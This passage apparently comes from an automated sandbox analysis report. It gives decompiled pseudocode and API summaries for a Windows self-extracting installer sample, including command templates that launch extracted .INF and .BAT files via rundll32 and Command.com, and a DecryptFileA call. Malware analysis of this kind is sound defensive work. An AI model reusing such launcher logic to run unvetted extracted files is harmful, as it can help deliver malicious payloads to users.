                                                                                                                                                                                                                                                				char _v1552;
                                                                                                                                                                                                                                                				CHAR* _v1556;
                                                                                                                                                                                                                                                				int* _v1560;
                                                                                                                                                                                                                                                				CHAR** _v1564;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t48;
                                                                                                                                                                                                                                                				CHAR* _t53;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				char* _t57;
                                                                                                                                                                                                                                                				char* _t58;
                                                                                                                                                                                                                                                				CHAR* _t60;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				signed char _t65;
                                                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                                                                				unsigned int _t85;
                                                                                                                                                                                                                                                				CHAR* _t90;
                                                                                                                                                                                                                                                				CHAR* _t92;
                                                                                                                                                                                                                                                				char _t105;
                                                                                                                                                                                                                                                				char _t106;
                                                                                                                                                                                                                                                				CHAR** _t111;
                                                                                                                                                                                                                                                				CHAR* _t115;
                                                                                                                                                                                                                                                				intOrPtr* _t125;
                                                                                                                                                                                                                                                				void* _t126;
                                                                                                                                                                                                                                                				CHAR* _t132;
                                                                                                                                                                                                                                                				CHAR* _t135;
                                                                                                                                                                                                                                                				void* _t138;
                                                                                                                                                                                                                                                				void* _t139;
                                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                                				intOrPtr* _t146;
                                                                                                                                                                                                                                                				char* _t148;
                                                                                                                                                                                                                                                				CHAR* _t151;
                                                                                                                                                                                                                                                				void* _t152;
                                                                                                                                                                                                                                                				CHAR* _t155;
                                                                                                                                                                                                                                                				CHAR* _t156;
                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                				signed int _t158;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t48 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                                				_t108 = __ecx;
                                                                                                                                                                                                                                                				_v1564 = _a4;
                                                                                                                                                                                                                                                				_v1560 = _a8;
                                                                                                                                                                                                                                                				E010E1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                                				if(_v528 != 0x22) {
                                                                                                                                                                                                                                                					_t135 = " ";
                                                                                                                                                                                                                                                					_t53 =  &_v528;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t135 = "\"";
                                                                                                                                                                                                                                                					_t53 =  &_v527;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t111 =  &_v1556;
                                                                                                                                                                                                                                                				_v1556 = _t53;
                                                                                                                                                                                                                                                				_t54 = E010E1A84(_t111, _t135);
                                                                                                                                                                                                                                                				_t156 = _v1556;
                                                                                                                                                                                                                                                				_t151 = _t54;
                                                                                                                                                                                                                                                				if(_t156 == 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_push(_t111);
                                                                                                                                                                                                                                                					E010E1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                                					E010E658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t132 = _t156;
                                                                                                                                                                                                                                                					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t105 =  *_t132;
                                                                                                                                                                                                                                                						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                                					} while (_t105 != 0);
                                                                                                                                                                                                                                                					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                                					if(_t111 < 3) {
                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t106 = _t156[1];
                                                                                                                                                                                                                                                					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                                						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						E010E1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                						_t138 = 0x2e;
                                                                                                                                                                                                                                                						_t57 = E010E66C8(_t156, _t138);
                                                                                                                                                                                                                                                						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                							_t139 = 0x2e;
                                                                                                                                                                                                                                                							_t115 = _t156;
                                                                                                                                                                                                                                                							_t58 = E010E66C8(_t115, _t139);
                                                                                                                                                                                                                                                							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                                								if(_t156 == 0) {
                                                                                                                                                                                                                                                									goto L43;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                                								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                									E010E1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_push(_t115);
                                                                                                                                                                                                                                                									_t108 = 0x400;
                                                                                                                                                                                                                                                									E010E1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                                									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                                										E010E16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                                										E010E16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t140 = _t156;
                                                                                                                                                                                                                                                								 *_t156 = 0;
                                                                                                                                                                                                                                                								E010E2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                                								goto L53;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                                								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                                								_t145 = _t125 + 1;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t76 =  *_t125;
                                                                                                                                                                                                                                                									_t125 = _t125 + 1;
                                                                                                                                                                                                                                                								} while (_t76 != 0);
                                                                                                                                                                                                                                                								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                                								_t146 =  &_v268;
                                                                                                                                                                                                                                                								_t157 = _t146 + 1;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t77 =  *_t146;
                                                                                                                                                                                                                                                									_t146 = _t146 + 1;
                                                                                                                                                                                                                                                								} while (_t77 != 0);
                                                                                                                                                                                                                                                								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                                								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                                								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                                								if(_t156 != 0) {
                                                                                                                                                                                                                                                									E010E171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                                									goto L53;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L43;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                								_t140 = 0x525;
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_t60 =  &_v268;
                                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t140 = "[";
                                                                                                                                                                                                                                                								_v1556 = _t151;
                                                                                                                                                                                                                                                								_t90 = E010E1A84( &_v1556, "[");
                                                                                                                                                                                                                                                								if(_t90 != 0) {
                                                                                                                                                                                                                                                									if( *_t90 != 0) {
                                                                                                                                                                                                                                                										_v1556 = _t90;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t140 = "]";
                                                                                                                                                                                                                                                									E010E1A84( &_v1556, "]");
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                                								if(_t156 == 0) {
                                                                                                                                                                                                                                                									L43:
                                                                                                                                                                                                                                                									_t60 = 0;
                                                                                                                                                                                                                                                									_t140 = 0x4b5;
                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                									_push(0x10);
                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                									L35:
                                                                                                                                                                                                                                                									_push(_t60);
                                                                                                                                                                                                                                                									E010E44B9(0, _t140);
                                                                                                                                                                                                                                                									_t62 = 0;
                                                                                                                                                                                                                                                									goto L54;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t155 = _v1556;
                                                                                                                                                                                                                                                									_t92 = _t155;
                                                                                                                                                                                                                                                									if( *_t155 == 0) {
                                                                                                                                                                                                                                                										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									 *0x10e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                                									 *_v1560 = 1;
                                                                                                                                                                                                                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10e1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                                										 *0x10e9a34 =  *0x10e9a34 & 0xfffffffb;
                                                                                                                                                                                                                                                										if( *0x10e9a40 != 0) {
                                                                                                                                                                                                                                                											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t108 = "setupx.dll";
                                                                                                                                                                                                                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										if( *_t155 == 0) {
                                                                                                                                                                                                                                                											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_push( &_v268);
                                                                                                                                                                                                                                                										_push(_t155);
                                                                                                                                                                                                                                                										E010E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										 *0x10e9a34 =  *0x10e9a34 | 0x00000004;
                                                                                                                                                                                                                                                										if( *_t155 == 0) {
                                                                                                                                                                                                                                                											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										E010E1680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                                										_t140 = 0x200;
                                                                                                                                                                                                                                                										E010E1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L53:
                                                                                                                                                                                                                                                									_t62 = 1;
                                                                                                                                                                                                                                                									 *_v1564 = _t156;
                                                                                                                                                                                                                                                									L54:
                                                                                                                                                                                                                                                									_pop(_t152);
                                                                                                                                                                                                                                                									return E010E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}














































                                                                                                                                                                                                                                                0x010e1c1b
                                                                                                                                                                                                                                                0x010e1c20
                                                                                                                                                                                                                                                0x010e1c2c
                                                                                                                                                                                                                                                0x010e1c33
                                                                                                                                                                                                                                                0x010e1c38
                                                                                                                                                                                                                                                0x010e1c3a
                                                                                                                                                                                                                                                0x010e1c3a
                                                                                                                                                                                                                                                0x010e1c40
                                                                                                                                                                                                                                                0x010e1c4b
                                                                                                                                                                                                                                                0x010e1c4b
                                                                                                                                                                                                                                                0x010e1c5d
                                                                                                                                                                                                                                                0x010e1c61
                                                                                                                                                                                                                                                0x010e1dd4
                                                                                                                                                                                                                                                0x010e1dd4
                                                                                                                                                                                                                                                0x010e1dd6
                                                                                                                                                                                                                                                0x010e1ddb
                                                                                                                                                                                                                                                0x010e1ddc
                                                                                                                                                                                                                                                0x010e1dde
                                                                                                                                                                                                                                                0x010e1d64
                                                                                                                                                                                                                                                0x010e1d64
                                                                                                                                                                                                                                                0x010e1d67
                                                                                                                                                                                                                                                0x010e1d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1c67
                                                                                                                                                                                                                                                0x010e1c67
                                                                                                                                                                                                                                                0x010e1c6d
                                                                                                                                                                                                                                                0x010e1c72
                                                                                                                                                                                                                                                0x010e1c74
                                                                                                                                                                                                                                                0x010e1c74
                                                                                                                                                                                                                                                0x010e1c8e
                                                                                                                                                                                                                                                0x010e1c99
                                                                                                                                                                                                                                                0x010e1cc0
                                                                                                                                                                                                                                                0x010e1cf8
                                                                                                                                                                                                                                                0x010e1d07
                                                                                                                                                                                                                                                0x010e1d23
                                                                                                                                                                                                                                                0x010e1d09
                                                                                                                                                                                                                                                0x010e1d14
                                                                                                                                                                                                                                                0x010e1d1b
                                                                                                                                                                                                                                                0x010e1d1b
                                                                                                                                                                                                                                                0x010e1d2b
                                                                                                                                                                                                                                                0x010e1d2d
                                                                                                                                                                                                                                                0x010e1d2d
                                                                                                                                                                                                                                                0x010e1d38
                                                                                                                                                                                                                                                0x010e1d39
                                                                                                                                                                                                                                                0x010e1d46
                                                                                                                                                                                                                                                0x010e1cc2
                                                                                                                                                                                                                                                0x010e1cc2
                                                                                                                                                                                                                                                0x010e1ccc
                                                                                                                                                                                                                                                0x010e1cce
                                                                                                                                                                                                                                                0x010e1cce
                                                                                                                                                                                                                                                0x010e1cdb
                                                                                                                                                                                                                                                0x010e1ce6
                                                                                                                                                                                                                                                0x010e1cee
                                                                                                                                                                                                                                                0x010e1cee
                                                                                                                                                                                                                                                0x010e1e89
                                                                                                                                                                                                                                                0x010e1e91
                                                                                                                                                                                                                                                0x010e1e92
                                                                                                                                                                                                                                                0x010e1e94
                                                                                                                                                                                                                                                0x010e1e97
                                                                                                                                                                                                                                                0x010e1ea4
                                                                                                                                                                                                                                                0x010e1ea4
                                                                                                                                                                                                                                                0x010e1c61
                                                                                                                                                                                                                                                0x010e1c07
                                                                                                                                                                                                                                                0x010e1bd3
                                                                                                                                                                                                                                                0x010e1b7b

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010E1BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 010E1C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 010E1C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010E1140,00000000,00000008,?), ref: 010E1CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 010E1D1B
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-3401884814
                                                                                                                                                                                                                                                • Opcode ID: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                                                                                                                                                                                                                                                • Instruction ID: 654b32289aa80ccd444a7e66062c3992cce5bb03941d03d4b986cd8a240a810c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1A16A70A042085FEF60AB2ACC4CBEA77E9EB95710F1442D9E5D5A72C0DBB18E85CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 10e2f1d-10e2f3d 407 10e2f3f-10e2f46 406->407 408 10e2f6c-10e2f73 call 10e5164 406->408 410 10e2f5f-10e2f66 call 10e3a3f 407->410 411 10e2f48 call 10e51e5 407->411 416 10e2f79-10e2f80 call 10e55a0 408->416 417 10e3041 408->417 410->408 410->417 418 10e2f4d-10e2f4f 411->418 416->417 424 10e2f86-10e2fbe GetSystemDirectoryA call 10e658a LoadLibraryA 416->424 420 10e3043-10e3053 call 10e6ce0 417->420 418->417 421 10e2f55-10e2f5d 418->421 421->408 421->410 428 10e2ff7-10e3004 FreeLibrary 424->428 429 10e2fc0-10e2fd4 GetProcAddress 424->429 430 10e3006-10e300c 428->430 431 10e3017-10e3024 SetCurrentDirectoryA 428->431 429->428 432 10e2fd6-10e2fee DecryptFileA 429->432 430->431 433 10e300e call 10e621e 430->433 434 10e3026-10e303c call 10e44b9 call 10e6285 431->434 435 10e3054-10e305a 431->435 432->428 441 10e2ff0-10e2ff5 432->441 445 10e3013-10e3015 433->445 434->417 436 10e305c call 10e3b26 435->436 437 10e3065-10e306c 435->437 447 10e3061-10e3063 436->447 443 10e306e-10e3075 call 10e256d 437->443 444 10e307c-10e3089 437->444 441->428 452 10e307a 443->452 449 10e308b-10e3091 444->449 450 10e30a1-10e30a9 444->450 445->417 445->431 447->417 447->437 449->450 453 10e3093 call 10e3ba2 449->453 455 10e30ab-10e30ad 450->455 456 10e30b4-10e30b7 450->456 452->444 460 10e3098-10e309a 453->460 455->456 457 10e30af call 10e4169 455->457 456->420 457->456 460->417 461 10e309c 460->461 461->450
                                                                                                                                                                                                                                                C-Code - Quality: 82%
			E010E2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x10e8004; // 0x71a8563c
				_v8 = _t9 ^ _t46;
				if( *0x10e8a38 != 0) {
					L5:
					_t11 = E010E5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E010E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E010E55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E010E658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x10ea288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x10e8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x10e8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x10e8d48 & 0x000000c0;
									if(( *0x10e8d48 & 0x000000c0) == 0) {
										_t41 =  *0x10e9a40; // 0x3, executed
										_t26 = E010E256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x10e8a24; // 0x0
									 *0x10e9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x10e8a38;
										if( *0x10e8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E010E4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x10e9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E010E3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x10e8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E010E3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x10e9124 = E010E6285();
							goto L16;
						}
						_t59 =  *0x10e9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E010E621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x10e8a24;
				if( *0x10e8a24 != 0) {
					L4:
					_t34 = E010E3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(E010E51E5(_t49) == 0) {
                                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t51 =  *0x10e8a38;
                                                                                                                                                                                                                                                				if( *0x10e8a38 != 0) {
                                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2f55
                                                                                                                                                                                                                                                0x010e2f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E2F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010E2FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010E2FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 010E2FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 010E2FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E301C
                                                                                                                                                                                                                                                  • Part of subcall function 010E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-3395714304
                                                                                                                                                                                                                                                • Opcode ID: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                                                                                                                                                                                                                                                • Instruction ID: 853da6c4a40e4634c7ab7976031a0ba841307db3622d0450f6a708e4c794cb28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B41DA31A002058EEB71AB3B9D5C69A3FE8BB54B54F0440A9FAD1CF145EB7AC980CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%


                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E010E2390(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v280;
                                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                				int _t36;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                                				_t21 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                                				_t65 = __ecx;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_pop(_t62);
                                                                                                                                                                                                                                                					_pop(_t66);
                                                                                                                                                                                                                                                					_pop(_t46);
                                                                                                                                                                                                                                                					return E010E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E010E1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                                					_t58 = 0x104;
                                                                                                                                                                                                                                                					E010E16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                                					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                                					_t63 = _t22;
                                                                                                                                                                                                                                                					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                						_t58 = 0x104;
                                                                                                                                                                                                                                                						E010E1680( &_v276, 0x104, _t65);
